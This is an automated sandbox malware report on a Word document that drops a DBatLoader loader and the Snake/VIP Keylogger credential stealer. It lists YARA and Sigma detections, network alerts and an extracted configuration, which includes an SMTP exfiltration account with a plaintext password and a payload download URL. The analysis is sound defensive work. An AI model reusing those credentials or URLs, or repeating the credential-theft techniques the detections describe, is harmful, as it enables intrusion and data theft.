16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
20.3.jphwmyiA.pif.283edba0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.3.jphwmyiA.pif.283edba0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
20.3.jphwmyiA.pif.283edba0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.3.jphwmyiA.pif.283edba0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
20.3.jphwmyiA.pif.283edba0.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.3.jphwmyiA.pif.283edba0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
16.2.jphwmyiA.pif.1a1d99de.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
12.2.jphwmyiA.pif.28730000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
12.2.jphwmyiA.pif.28fc0000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
20.3.jphwmyiA.pif.283edba0.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1a1d99de.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.28fc0000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
20.3.jphwmyiA.pif.283edba0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
12.2.jphwmyiA.pif.28fc0000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
16.2.jphwmyiA.pif.1a1d99de.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
Click to see the 285 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 2072, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\jphwmyiA.pif, NewProcessName: C:\Users\Public\Libraries\jphwmyiA.pif, OriginalFileName: C:\Users\Public\Libraries\jphwmyiA.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 2072, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, ProcessId: 6396, ProcessName: jphwmyiA.pif

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 1892, TargetFilename: C:\Windows\SysWOW64\brightness.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 2072, TargetFilename: C:\Windows \SysWOW64\svchost.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Aiymwhpj.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 2072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aiymwhpj

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Aiymwhpj.PIF" , ParentImage: C:\Users\Public\Libraries\Aiymwhpj.PIF, ParentProcessId: 1020, ParentProcessName: Aiymwhpj.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 6728, ProcessName: cmd.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\jphwmyiA.pif, Initiated: true, ProcessId: 6396, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49733

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Aiymwhpj.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 2072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aiymwhpj

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\jphwmyiA.pif, NewProcessName: C:\Users\Public\Libraries\jphwmyiA.pif, OriginalFileName: C:\Users\Public\Libraries\jphwmyiA.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 2072, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, ProcessId: 6396, ProcessName: jphwmyiA.pif

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49710, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 1892, Protocol: tcp, SourceIp: 147.124.216.113, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.198.176, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\jphwmyiA.pif, Initiated: true, ProcessId: 6396, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49989

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T13:25:20.204571+0100	2803305	3	Unknown Traffic	192.168.2.5	49802	188.114.97.3	443	TCP
2025-01-07T13:25:26.189834+0100	2803305	3	Unknown Traffic	192.168.2.5	49843	188.114.97.3	443	TCP
2025-01-07T13:25:29.296135+0100	2803305	3	Unknown Traffic	192.168.2.5	49866	188.114.97.3	443	TCP
2025-01-07T13:25:30.506587+0100	2803305	3	Unknown Traffic	192.168.2.5	49879	188.114.97.3	443	TCP
2025-01-07T13:25:32.098031+0100	2803305	3	Unknown Traffic	192.168.2.5	49896	188.114.97.3	443	TCP
2025-01-07T13:25:33.925471+0100	2803305	3	Unknown Traffic	192.168.2.5	49912	188.114.97.3	443	TCP
2025-01-07T13:25:34.061984+0100	2803305	3	Unknown Traffic	192.168.2.5	49913	188.114.97.3	443	TCP
2025-01-07T13:25:34.145521+0100	2803305	3	Unknown Traffic	192.168.2.5	49914	188.114.97.3	443	TCP
2025-01-07T13:25:40.157761+0100	2803305	3	Unknown Traffic	192.168.2.5	49968	188.114.97.3	443	TCP
2025-01-07T13:25:42.997193+0100	2803305	3	Unknown Traffic	192.168.2.5	49996	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T13:25:17.212528+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49733	132.226.8.169	80	TCP
2025-01-07T13:25:19.602455+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49733	132.226.8.169	80	TCP
2025-01-07T13:25:23.336682+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49807	132.226.8.169	80	TCP
2025-01-07T13:25:25.601243+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49831	132.226.8.169	80	TCP
2025-01-07T13:25:26.078233+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49813	132.226.8.169	80	TCP
2025-01-07T13:25:27.143228+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49848	132.226.8.169	80	TCP
2025-01-07T13:25:30.116047+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49813	132.226.8.169	80	TCP
2025-01-07T13:25:30.300073+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49872	132.226.8.169	80	TCP
2025-01-07T13:25:31.350398+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49886	132.226.8.169	80	TCP
2025-01-07T13:25:31.522386+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49872	132.226.8.169	80	TCP
2025-01-07T13:25:33.569168+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49904	132.226.8.169	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T13:25:34.976314+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49920	149.154.167.220	443	TCP
2025-01-07T13:25:42.243631+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49986	149.154.167.220	443	TCP
2025-01-07T13:25:43.911647+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	50001	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ENQ-0092025.doc

Avira: detected

Found malware configuration

Source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}
Source: 8.0.brightness.exe.400000.0.unpack	Malware Configuration Extractor: DBatLoader {"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}

Multi AV Scanner detection for submitted file

Source: ENQ-0092025.doc

ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: ENQ-0092025.doc

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 12.2.jphwmyiA.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 16.2.jphwmyiA.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 20.2.jphwmyiA.pif.400000.1.unpack

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49795 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49871 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49887 version: TLS 1.0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50001 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230785597.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2198932373.000000007F410000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.000000000251A000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.2235153147.000000002455F000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2336023047.0000000018834000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2431587396.0000000028445000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000008.00000002.2230547224.0000000021382000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230785597.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199849372.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2198932373.000000007F410000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.000000000251A000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318408948.000000000070E000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318408948.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000011.00000003.2397508474.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000011.00000003.2397508474.0000000000889000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_028358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

8_2_028358B4

Software Vulnerabilities

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: brightness.exe.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\brightness.exe

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	12_2_2600DC80
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	12_2_2911FD28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2911F2B5h	12_2_2911F0C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2911FC3Fh	12_2_2911F0C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	12_2_2911FD20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_2911EDFB
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_2911EC1B
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2911E0C5h	12_2_2911DF07
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2911E0C5h	12_2_2911E114
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_2911E5E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1D10E9h	12_2_2A1D0E38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1D185Dh	12_2_2A1D1440
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DB829h	12_2_2A1DB580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DC0D9h	12_2_2A1DBE30
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DF4F9h	12_2_2A1DF250
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DC531h	12_2_2A1DC288
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DF951h	12_2_2A1DF6A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DC989h	12_2_2A1DC6E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DFDA9h	12_2_2A1DFB00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DCDE1h	12_2_2A1DCB38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DD239h	12_2_2A1DCF90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1D185Dh	12_2_2A1D178B
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DD691h	12_2_2A1DD3E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DDAE9h	12_2_2A1DD840
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DDF41h	12_2_2A1DDC98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DE399h	12_2_2A1DE0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DE7F1h	12_2_2A1DE548
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DEC49h	12_2_2A1DE9A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DBC81h	12_2_2A1DB9D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1DF0A1h	12_2_2A1DEDF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EBCDEh	12_2_2A1EBA10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, 000003E8h	12_2_2A1EFE80
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E7DC0h	12_2_2A1E7AF0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EA60Eh	12_2_2A1EA340
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E1449h	12_2_2A1E11A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E68FDh	12_2_2A1E65C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EDCCEh	12_2_2A1EDA00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E48C9h	12_2_2A1E4620
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E1CF9h	12_2_2A1E1A50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1ECF1Eh	12_2_2A1ECC50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EEF0Eh	12_2_2A1EEC40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E02E9h	12_2_2A1E0040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E4D21h	12_2_2A1E4A78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, 000003E8h	12_2_2A1EFE70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E3311h	12_2_2A1E3068
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EAF2Eh	12_2_2A1EAC60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E5709h	12_2_2A1E5460
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E0741h	12_2_2A1E0498
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EE15Eh	12_2_2A1EDE90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E5B61h	12_2_2A1E58B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EA17Eh	12_2_2A1E9EB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E2151h	12_2_2A1E1EA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1EC16Eh	12_2_2A1EBEA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2A1E517Bh	12_2_2A1E4ED0
